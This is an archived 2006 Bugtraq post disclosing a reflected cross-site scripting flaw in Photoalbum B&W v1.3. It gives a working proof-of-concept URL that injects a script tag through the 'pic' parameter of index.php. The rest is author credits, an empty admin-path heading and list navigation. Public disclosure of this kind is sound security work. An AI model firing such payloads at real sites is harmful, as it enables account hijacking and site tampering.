[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Xss exploit in Photoalbum B&W v1.3

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Xss exploit in Photoalbum B&W v1.3
From: black-cod3@xxxxxxxxxxx
Date: 28 May 2006 22:04:04 -0000

Xss exploit in Photoalbum B&W v1.3

forum type : Photoalbum B&W v1.3
bug found by : black-code & sweet-devil
team : site-down
type : Xss

####################################################
exploit :


http://www.example.com/superalbum/index.php?pic='><script>alert(10)</script>

####################################################

path to admin login:

#######################
emails: 

black-cod3@xxxxxxxxxxx  &  gamr-14@xxxxxxxxxxx
#######################


All my respect to our friends , lezr.com , g123g.net 


done .. peace

Prev by Date: VARIOMAT(advanced cms tool)SQL injection/XSS
Next by Date: [KAPDA::#45] - geeklog multiple vulnerabilities
Previous by thread: VARIOMAT(advanced cms tool)SQL injection/XSS
Next by thread: [KAPDA::#45] - geeklog multiple vulnerabilities
Index(es):
- Date
- Thread